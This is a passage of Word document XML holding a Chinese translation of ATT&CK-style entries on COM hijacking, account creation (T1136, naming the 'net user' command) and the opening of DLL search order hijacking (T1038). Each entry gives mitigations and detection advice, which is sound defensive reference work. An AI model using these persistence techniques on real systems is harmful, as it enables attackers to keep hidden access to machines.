        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的一个系统，用于通过操作系统实现软件组件之间的交互。攻击者可能会使用此系统插入恶意代码，通过劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用和关系作为持久性手段来代替合法软件执行。劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象需要更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表以替换对合法系统组件的引用，这可能导致该组件在执行时无法工作。当通过正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的系统操作执行该</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统组件时，将执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>却是攻击者的代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会劫持频繁使用的对象以保持一致的持久性，但不太可能破坏系统内的明显功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>破坏</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>内明显功能会导致系统不稳定，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1400FF06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054452C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2927C48E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC3A86" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有机会通过搜索已被替换的注册表引用和通过注册表操作将已知二进制路径替换为未知路径来检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持。即使某些第三方应用定义了用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，但</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Classes\CLSID\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存在对象可能是不正常的，应进行调查，因为用户对象将在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的机器对象之前加载。现有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的注册表项可能不经常更改。当具有已知良好路径和二进制文件的条目被替换或此</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>条目值被</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改为异常值来指向新位置中的未知二进制文件时，则可能表示有可疑行为并应进行调查。同样，如果收集并分析了软件动态链接库加载，则任何与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象注册表修改相关的异常动态链接库加载都可能表示已发生了</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E16B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建账号</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="569A379D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC999C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1136</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A1D75E2" w14:textId="67B34915" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47402BFA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E3FD9A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C84A003" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，认证日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66FB6D3A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7554714D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438B8D0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有足够访问级别权限的攻击者可以创建本地系统或域账号。此类账号可用于持久性，不需要在系统上部署持久性远程访问工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF5C7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来创建本地或域账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717BA0F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007A0695" w14:paraId="68478D2A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2EDB0C1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="246C42B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007A0695" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A0695">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5FAB7863" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BFF70AE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>多因子认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="319296AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对用户和特权账号使用多因子认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="42EF3EF2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50364C60" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1CD39E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置访问控制和防火墙来限制访问用于创建和管理账号的域控制器和系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="58B9A802" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F4EAEFD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="389C2163" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过确保关键服务器的适当安全配置来保护域控制器。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="63847EA5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656F34C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7648D79C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不允许将域管理员账号用于日常操作因为这些操作可能会将域管理员账号暴露给非特权系统上的潜在攻击者。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CFB6D42" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049B7DB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C323EA0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集网络内账号创建相关数据。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和域控制器上创建用户账号时生成事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4720</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。定期审核域和本地系统账号啦查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者创建了可疑账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9970F8" w14:textId="31478064" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00C226AC" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搜索顺序劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7C11B353" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F8FA2B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1038</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3461873E" w14:textId="124EC04A" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级，防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C8E23AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FB68A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能够添加动态链接库，清单文件或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.local</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件、目录或连接</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE9DEF4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1AF0C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D94270F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
